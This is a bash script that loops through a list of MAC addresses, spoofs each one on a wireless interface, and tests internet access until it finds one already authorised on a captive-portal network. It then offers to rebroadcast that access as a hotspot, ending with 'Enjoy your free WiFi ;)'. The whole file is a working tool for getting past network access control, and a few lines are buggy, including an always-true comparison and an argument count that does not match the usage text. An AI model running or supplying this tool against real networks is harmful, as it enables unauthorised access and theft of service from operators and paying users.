#!/bin/bash
testip=example.com
maccount=$(($2-1))
interface=$4
interfacemon="${interface}mon"

if [ $# -eq 4 ]
then
	#for i in {1..number of macs}
	i=1
	while [ $i -le $maccount ]; do
		echo "Starting! Testing $maccount macs..."
		echo ""

		# Get next mac address
		curmac=$(head -n $i $1 | tail -n 1)

		# change mac address
		echo -n "Changing MAC... "
		modules/change_mac $curmac $interface &> /dev/null
		echo "Done."

		# Tell the user whats happening
                echo "$i/$2"
		echo "MAC: $curmac"

		echo -n "IP:  "
                curip=$(ifconfig $interface | sed -En 's/127.0.0.1//;s/.*inet (addr:)?(([0-9]*\.){3}[0-9]*).*/\2/p')
                echo "$curip"

		# Try downloading site

		#wget --no-cache --no-cookies --no-http-keep-alive -T 10 --show-progress -nv $testip -o wgetout &> /dev/null
		echo -n "Checking access... "
		httpcode=$(wget --no-cache --no-cookies --no-http-keep-alive -T 10 -S "$testip" 2>&1 | grep "HTTP/" -m 1 | awk '{print $2}')

		# Test connection

		#httpcode=$(grep -v $testip wgetout | grep -v saved | cut -c44-)
		echo "$httpcode"

		if [ "$httpcode" -eq "200" ]
		then # Connection!
			echo "Access detected!"
			read -n 1 -p "Start hotspot? (Y/n):" starthotspot

			if [ "$starthotspot"="n" ]; then
				echo "Enjoy your free WiFi ;)"
				echo "Exiting..."
			else
				read -p "Path of create_ap script: " createappath
				read -p "Name of access point: " apname
				read -p "AP password (min 8 chars): " appass
				$createappath $interface $interface $apname $appass
			fi

			rm index.html
			#rm wgetout
			exit

		else # No connection
			echo "No access."
		fi
		echo ""
		echo "----------------------------------------"
		echo ""
		i=$(($i + 1))
	done
	echo "No associated MAC addresses found. Exiting..."
	exit
else
	echo ""
	echo "Incorrect number of arguments! (detected $#)"
	echo ""
	echo "Useage:"
	echo "$0 {mac address file} {macs to check} {interface}"
	echo ""
fi
